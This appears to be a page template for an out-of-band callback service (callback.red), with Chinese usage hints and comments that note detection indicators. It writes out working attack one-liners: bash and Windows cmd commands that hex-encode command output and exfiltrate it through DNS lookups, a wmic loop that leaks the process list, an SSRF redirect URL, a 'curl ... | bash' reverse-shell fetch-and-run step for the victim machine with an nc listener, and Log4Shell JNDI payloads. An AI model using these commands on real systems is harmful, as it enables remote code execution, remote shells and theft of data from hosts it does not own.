# | Type | Record | IP | Req_body | Time |
---|---|---|---|---|---|
{{ index }} | {{ record.type }} | {{ record.subdomain }} | {{ record.ip }} | {{ record.reqbody }} | {{ record.time }} |
# Rendered from a template: "{{dns_command}}" is substituted before this runs
# and the result is handed to eval, so whatever string the template produces
# is executed verbatim.
# The command's stdout is hex-encoded byte by byte (uppercase, no separators)
# and carried out over DNS: the hex string is cut into 63-character pieces
# (63 is the DNS label length limit) and each piece is resolved once via
# `ping -c 1` as
#   <hex chunk>.<1-based chunk index>.<4-char [a-z0-9] run tag>.cmd.{{domain}}
# Detection/triage: queries under cmd.{{domain}} whose leftmost label is a
# long all-hex string followed by a numeric sequence label are the indicator;
# the index restores ordering and the random tag groups one run. Ping's own
# output is discarded, so only the resolver traffic carries the data.
# The trailing `sed 's/^[\n\r]*//g'` on the tag appears to be a no-op, since
# `tr -dc 'a-z0-9'` has already removed CR/LF.
CMD="{{dns_command}}";RExSP="$(eval "$CMD"|hexdump -v -e '/1
"%02X"')";R=$(tr -dc 'a-z0-9' </dev/urandom | head -c 4 | sed
's/^[\n\r]*//g');i=0;for s in $(echo $RExSP|fold -w 63);do
i=$((i+1));ping -c 1 "$s.$i.$R.cmd.{{domain}}">/dev/null;done
REM Windows cmd counterpart of the bash DNS one-liner. "{{dns_command}}" is
REM substituted by the template; its stdout is written to the file execfile7 in
REM the current directory, converted by certutil -encodehex (format 4; judging
REM by the Tokens=1-16 parse below it yields lines of 16 space-separated hex
REM bytes) into execfile7.txt, and both files are deleted at the end.
REM findstr /n numbers each line (%a = line number, %b = the hex bytes); the
REM inner loop joins up to 16 bytes into one 32-character label and resolves,
REM via ping,
REM   <hex bytes>.<line number>.<%RANDOM% run tag>.cmd.{{domain}}
REM Host-side artefacts for forensics: the two temporary files (created, then
REM deleted, in the working directory) and a certutil -encodehex invocation, a
REM frequently monitored living-off-the-land pattern. Network-side, the same
REM hex/sequence label shape under cmd.{{domain}} as the bash variant.
{{dns_command}} 1> execfile7 && certutil -encodehex -f execfile7
execfile7.txt 4 && (for /f "Delims=: Tokens=1-2" %a in ('findstr
/n . execfile7.txt') do (for /f "Tokens=1-16" %c in ('echo
%b')do ping -nc 1
%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r.%a.%RANDOM%.cmd.{{domain}})) &&
del execfile7 && del execfile7.txt
REM Lists running processes with wmic and, for every output line findstr
REM matches against ".exe", resolves <process name>.cmd.{{domain}} via ping,
REM so the process list leaves the host as DNS query names. "> nul" only
REM silences ping's console output. Detection: a `wmic process get Name`
REM execution followed by a burst of queries whose leftmost label looks like
REM an executable name under cmd.{{domain}}.
for /F %i in ('wmic process get Name ^| findstr .exe') do ping -nc 1 %i.cmd.{{domain}} > nul
{{ record.content }}
callback.red/ssrf/10.10.1.1/
=> $ curl callback.red/ssrf/10.10.1.1/ < HTTP/1.1 302 Found < Server: nginx/1.20.1 < Date: Sun, 16 Jan 2022 15:41:36 GMT < Content-Type: text/html;charset=utf-8 < Content-Length: 0 < Connection: keep-alive < Cache-Control: must-revalidate, no-store < Location: http://10.10.1.1/
callback.red/sh4ll/{{ip_address}}:{{ip_port}}
受害者机器:
=> $ curl callback.red/sh4ll/{{ip_address}}:{{ip_port}} | bash or $ curl callback.red/sh4ll/{{ip_address}}:{{ip_port}} | sh
你的VPS:
=> $ nc -lvvp {{ip_port}} => listening on [any] {{ip_port}} ... connect to [{{ip_address}}] from fbi.gov [127.0.0.1] 46958
rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/ ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/ 路径后可以添加任何字符或留空，便于识别区分，如： ${jndi:ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/test} ${jndi:rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/hello}